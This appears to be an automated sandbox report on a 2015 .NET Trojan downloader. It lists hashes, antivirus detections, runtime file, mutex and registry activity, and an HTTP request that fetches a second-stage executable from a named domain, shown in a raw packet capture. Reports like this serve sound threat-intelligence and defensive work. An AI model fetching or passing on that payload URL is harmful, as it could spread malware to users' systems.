Analysis Date: 2015-10-21 15:38:05
MD5: f38e6afee5fb177b9f312c0d178ce1c6
SHA1: f52ec8e8948d421027efccb760f87bc0d3d7d1de

Static Details:

File type: PE32 executable for MS Windows (GUI) Intel 80386 32-bit Mono/.Net assembly
Section .text md5: 6376aa6606f2cc8f37420e7bc8c4aaeb sha1: 7850aa06c4127159e851a1bdda2bd65c3d857f3d size: 10752
Section .rsrc md5: bf619eac0cdf3f68d496ea9344137e8b sha1: 5c3eb80066420002bc3dcc7ca4ab6efad7ed4ae5 size: 512
Section .reloc md5: f915ff8afa0c404927ae1d8f77c7207d sha1: 9586aebfebd1069a3c0b8fed4502f9162ce69374 size: 512
Timestamp: 2015-10-11 16:47:23
Packer: Microsoft Visual C# v7.0 / Basic .NET
PEhash: 0f1e9387c67591bdf758a5b3bd7081c11bd4d93b
IMPhash: f34d5f2d4577ed6d9ceec516c1f5a744
AV CA (E-Trust Ino): no_virus
AV F-Secure: Trojan.GenericKD.2800063
AV Dr. Web: no_virus
AV ClamAV: no_virus
AV Arcabit (arcavir): Trojan.GenericKD.2800063
AV BullGuard: Trojan.GenericKD.2800063
AV Padvish: no_virus
AV VirusBlokAda (vba32): no_virus
AV CAT (quickheal): no_virus
AV Trend Micro: no_virus
AV Kaspersky: Backdoor.Win32.Kasidet.das
AV Zillya!: Trojan.Bladabindi.Win32.27710
AV Emsisoft: Trojan.GenericKD.2800063
AV Ikarus: Trojan-Downloader.MSIL.Agent
AV Frisk (f-prot): no_virus
AV Authentium: no_virus
AV MalwareBytes: no_virus
AV MicroWorld (escan): no_virus
AV Microsoft Security Essentials: no_virus
AV K7: Trojan-Downloader ( 004c43101 )
AV BitDefender: Trojan.GenericKD.2800063
AV Fortinet: W32/Kasidet.DAS!tr.bdr
AV Symantec: no_virus
AV Grisoft (avg): no_virus
AV Eset (nod32): MSIL/TrojanDownloader.Agent.QB
AV Alwil (avast): GenMalicious-BL [Trj]
AV Ad-Aware: Trojan.GenericKD.2800063
AV Twister: no_virus
AV Avira (antivir): TR/Downloader.A.27188
AV Mcafee: no_virus
AV Rising: no_virus

Runtime Details:

Process
↳ C:\malware.exe

Creates File: PIPE\ROUTER
Creates File: PIPE\lsarpc
Creates File: C:\Documents and Settings\Administrator\Local Settings\Temp\netbios.exe
Creates File: \Device\Afd\Endpoint
Deletes File: C:\Documents and Settings\Administrator\Local Settings\Temp\netbios.exe
Creates Process: dw20.exe -x -s 728
Creates Mutex: Global\.net clr networking
Creates Mutex: Global\CLR_RESERVED_MUTEX_NAME
Starts Service: RASMAN

Process
↳ C:\WINDOWS\system32\svchost.exe

Process
↳ Pid 804

Process
↳ Pid 848

Process
↳ C:\WINDOWS\System32\svchost.exe

Registry: HKEY_LOCAL_MACHINE\Software\Microsoft\WBEM\CIMOM\List of event-active namespaces ➝ NULL
Creates File: PIPE\wkssvc
Creates File: WANARP
Creates File: PIPE\lsarpc
Creates File: C:\WINDOWS\system32\WBEM\Repository\$WinMgmt.CFG
Creates File: C:\WINDOWS\system32\WBEM\Logs\wbemess.log
Creates Mutex: Global\RAS_MO_01
Creates Mutex: RAS_MO_02

Process
↳ Pid 1204

Process
↳ C:\WINDOWS\system32\spoolsv.exe

Registry: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Print\BeepEnabled ➝ NULL
Registry: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System\Print\TypesSupported ➝ 7
Registry: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Print\Printers\SymbolicLinkValue ➝ NULL
Registry: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Print\Printers\DefaultSpoolDirectory ➝ C:\WINDOWS\System32\spool\PRINTERS\\x00
Creates File: WMIDataDevice

Process
↳ Pid 1860

Process
↳ Pid 1056

Process
↳ dw20.exe -x -s 728

Registry: HKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝ NULL
Creates File: C:\Documents and Settings\Administrator\Local Settings\Temp\13534.dmp
Creates File: PIPE\ROUTER
Creates File: C:\Documents and Settings\Administrator\Local Settings\Temp\dw.log
Creates File: C:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
Creates File: C:\Documents and Settings\Administrator\Cookies\index.dat
Creates File: PIPE\lsarpc
Creates File: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Deletes File: C:\Documents and Settings\Administrator\Local Settings\Temp\13534.dmp
Creates Mutex: c:!documents and settings!administrator!local settings!history!history.ie5!
Creates Mutex: WininetConnectionMutex
Creates Mutex: c:!documents and settings!administrator!cookies!
Creates Mutex: c:!documents and settings!administrator!local settings!temporary internet files!content.ie5!

Network Details:

DNS: emeric-guyon.fr
Type: A
213.186.33.19
HTTP GET: http://emeric-guyon.fr/css/gb.exe
User-Agent:
Flows TCP: 192.168.1.1:1031 ➝ 213.186.33.19:80

Raw Pcap
0x00000000 (00000)   47455420 2f637373 2f67622e 65786520   GET /css/gb.exe 
0x00000010 (00016)   48545450 2f312e31 0d0a486f 73743a20   HTTP/1.1..Host: 
0x00000020 (00032)   656d6572 69632d67 75796f6e 2e66720d   emeric-guyon.fr.
0x00000030 (00048)   0a436f6e 6e656374 696f6e3a 204b6565   .Connection: Kee
0x00000040 (00064)   702d416c 6976650d 0a0d0a              p-Alive....
Strings